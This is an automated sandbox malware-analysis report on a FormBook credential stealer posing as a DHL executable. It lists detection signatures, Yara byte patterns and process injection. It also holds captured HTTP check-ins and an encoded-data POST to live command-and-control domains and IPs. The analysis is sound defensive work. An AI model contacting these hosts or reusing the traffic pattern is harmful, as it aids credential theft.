Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL 073412182024.exe

Overview

General Information

Sample name:DHL 073412182024.exe
Analysis ID:1578019
MD5:9ad73be33f667e2400dab66ba0c20058
SHA1:c8aef0388f3a85183cfa8aeeb24a3bf9b1ce9053
SHA256:4d63883ce64474b643f30b2e3e3876710a92a861c52a1a452c4d86955d1b5f1e
Tags:exeSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • DHL 073412182024.exe (PID: 6680 cmdline: "C:\Users\user\Desktop\DHL 073412182024.exe" MD5: 9AD73BE33F667E2400DAB66BA0C20058)
    • svchost.exe (PID: 3632 cmdline: "C:\Users\user\Desktop\DHL 073412182024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • ihoQcJjaPvtmjn.exe (PID: 3300 cmdline: "C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netbtugc.exe (PID: 3652 cmdline: "C:\Windows\SysWOW64\netbtugc.exe" MD5: EE7BBA75B36D54F9E420EB6EE960D146)
          • firefox.exe (PID: 5688 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.4179871193.0000000003210000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.4179871193.0000000003210000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000001.00000002.1883549060.00000000032C0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1883549060.00000000032C0000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a6e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13d7f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.4190913591.0000000008D50000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries
        SourceRuleDescriptionAuthorStrings
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d063:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16702:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            1.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2de63:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17502:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DHL 073412182024.exe", CommandLine: "C:\Users\user\Desktop\DHL 073412182024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 073412182024.exe", ParentImage: C:\Users\user\Desktop\DHL 073412182024.exe, ParentProcessId: 6680, ParentProcessName: DHL 073412182024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 073412182024.exe", ProcessId: 3632, ProcessName: svchost.exe
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\DHL 073412182024.exe", CommandLine: "C:\Users\user\Desktop\DHL 073412182024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\DHL 073412182024.exe", ParentImage: C:\Users\user\Desktop\DHL 073412182024.exe, ParentProcessId: 6680, ParentProcessName: DHL 073412182024.exe, ProcessCommandLine: "C:\Users\user\Desktop\DHL 073412182024.exe", ProcessId: 3632, ProcessName: svchost.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-19T06:41:33.317202+010020507451Malware Command and Control Activity Detected192.168.2.449736154.215.72.11080TCP
            2024-12-19T06:42:07.266008+010020507451Malware Command and Control Activity Detected192.168.2.449762116.50.37.24480TCP
            2024-12-19T06:43:30.751236+010020507451Malware Command and Control Activity Detected192.168.2.44982185.159.66.9380TCP
            2024-12-19T06:43:45.540170+010020507451Malware Command and Control Activity Detected192.168.2.44999091.195.240.9480TCP
            2024-12-19T06:44:13.817243+010020507451Malware Command and Control Activity Detected192.168.2.45001966.29.149.4680TCP
            2024-12-19T06:44:29.103690+010020507451Malware Command and Control Activity Detected192.168.2.450023195.110.124.13380TCP
            2024-12-19T06:45:00.511950+010020507451Malware Command and Control Activity Detected192.168.2.450027217.196.55.20280TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://www.rssnewscast.com/fo8o/?Sj=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&K8tpX=HvRPZ2CX3Avira URL Cloud: Label: malware
            Source: http://www.elettrosistemista.zip/fo8o/?K8tpX=HvRPZ2CX3&Sj=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE=Avira URL Cloud: Label: malware
            Source: http://www.goldenjade-travel.com/fo8o/?K8tpX=HvRPZ2CX3&Sj=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4=Avira URL Cloud: Label: malware
            Source: DHL 073412182024.exeVirustotal: Detection: 56%Perma Link
            Source: DHL 073412182024.exeReversingLabs: Detection: 57%
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4179871193.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1883549060.00000000032C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4190913591.0000000008D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4179927444.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1883088525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4178788966.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1884125832.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4180201411.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: DHL 073412182024.exeJoe Sandbox ML: detected
            Source: DHL 073412182024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ihoQcJjaPvtmjn.exe, 00000002.00000000.1806584101.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL 073412182024.exe, 00000000.00000003.1748469531.0000000003860000.00000004.00001000.00020000.00000000.sdmp, DHL 073412182024.exe, 00000000.00000003.1748744379.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1794304995.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1883601522.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1790153905.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1883601522.000000000359E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1885821131.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180175130.0000000003470000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1883428748.0000000003119000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180175130.000000000360E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL 073412182024.exe, 00000000.00000003.1748469531.0000000003860000.00000004.00001000.00020000.00000000.sdmp, DHL 073412182024.exe, 00000000.00000003.1748744379.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1794304995.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1883601522.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1790153905.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1883601522.000000000359E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000003.00000003.1885821131.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180175130.0000000003470000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1883428748.0000000003119000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180175130.000000000360E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000002.1883306387.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1852198880.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, ihoQcJjaPvtmjn.exe, 00000002.00000003.1953492858.0000000000D7C000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: ihoQcJjaPvtmjn.exe, 00000002.00000002.4189634765.000000000691C000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180786446.0000000003A9C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4179067242.0000000002ECE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2168944344.0000000036A3C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: ihoQcJjaPvtmjn.exe, 00000002.00000002.4189634765.000000000691C000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180786446.0000000003A9C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4179067242.0000000002ECE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2168944344.0000000036A3C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000002.1883306387.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1852198880.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, ihoQcJjaPvtmjn.exe, 00000002.00000003.1953492858.0000000000D7C000.00000004.00000001.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E0DBBE
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E168EE FindFirstFileW,FindClose,0_2_00E168EE
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00E1698F
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E0D076
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E0D3A9
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E19642
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E1979D
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00E19B2B
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E15C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00E15C97
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02B4BAB0 FindFirstFileW,FindNextFileW,FindClose,3_2_02B4BAB0
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 4x nop then pop edi2_2_08DC69CE
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 4x nop then pop edi2_2_08DC6AD5
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 4x nop then pop edi2_2_08DD6699
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 4x nop then xor eax, eax2_2_08DCAF40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then xor eax, eax3_2_02B39480
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then pop edi3_2_02B3DD45
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4x nop then mov ebx, 00000004h3_2_0333053E

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49762 -> 116.50.37.244:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 154.215.72.110:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49821 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50019 -> 66.29.149.46:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49990 -> 91.195.240.94:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50023 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50027 -> 217.196.55.202:80
            Source: DNS query: www.joyesi.xyz
            Source: DNS query: www.joyesi.xyz
            Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
            Source: Joe Sandbox ViewIP Address: 154.215.72.110 154.215.72.110
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E1CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_00E1CE44
            Source: global trafficHTTP traffic detected: GET /fo8o/?K8tpX=HvRPZ2CX3&Sj=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?K8tpX=HvRPZ2CX3&Sj=LFKqyrcu7g1NCa8bLlrIs+M38ZMJrQSprIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2zMIkigvi6pIX6i8MuAeXHNrENDnI2WJi/4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?K8tpX=HvRPZ2CX3&Sj=qL3nKp+YSjoaTomnOzyxpXPFUBhLgkHGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKFgJSPFkq5dbaCOx4WcoETVBbNsEZyvIPzk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Sj=x3jV/ECx7FuzXOI+5yB0DB/+zmAHn47HyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNuo48jXK1aHHk/BJwdjwjaHe/B0IWhwIR9Wc=&K8tpX=HvRPZ2CX3 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Sj=vefd0teQh+kbruh+h6aX8PBfjiL7oFyRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd7w81ULHWk02cFWPIOqV4u3afmCGnKNzdpU=&K8tpX=HvRPZ2CX3 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?K8tpX=HvRPZ2CX3&Sj=bO1UBvtoHFNUmlWB4HLJpEjmeTUqQxU1qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLzFMa6Onx1WMpNg/TOHpJ+sdeDHYknqJlyE= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficHTTP traffic detected: GET /fo8o/?Sj=mxnR+iHPFb8HZiaGfeL/C2cRfJ+ne5kRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfBV1+IPAGotTT7HDcUO7JjOgJKpj6i9KOMs=&K8tpX=HvRPZ2CX3 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Source: global trafficDNS traffic detected: DNS query: www.3xfootball.com
            Source: global trafficDNS traffic detected: DNS query: www.kasegitai.tokyo
            Source: global trafficDNS traffic detected: DNS query: www.goldenjade-travel.com
            Source: global trafficDNS traffic detected: DNS query: www.antonio-vivaldi.mobi
            Source: global trafficDNS traffic detected: DNS query: www.magmadokum.com
            Source: global trafficDNS traffic detected: DNS query: www.rssnewscast.com
            Source: global trafficDNS traffic detected: DNS query: www.liangyuen528.com
            Source: global trafficDNS traffic detected: DNS query: www.techchains.info
            Source: global trafficDNS traffic detected: DNS query: www.elettrosistemista.zip
            Source: global trafficDNS traffic detected: DNS query: www.donnavariedades.com
            Source: global trafficDNS traffic detected: DNS query: www.660danm.top
            Source: global trafficDNS traffic detected: DNS query: www.empowermedeco.com
            Source: global trafficDNS traffic detected: DNS query: www.joyesi.xyz
            Source: global trafficDNS traffic detected: DNS query: www.k9vyp11no3.cfd
            Source: unknownHTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 199Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 53 6a 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 64 4c 4e 69 4b 4e 35 6c 6e 6e 59 57 6a 72 30 50 55 51 69 66 77 72 76 4a 78 5a 5a 4d 4e 6d 50 57 67 3d 3d Data Ascii: Sj=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOdLNiKN5lnnYWjr0PUQifwrvJxZZMNmPWg==
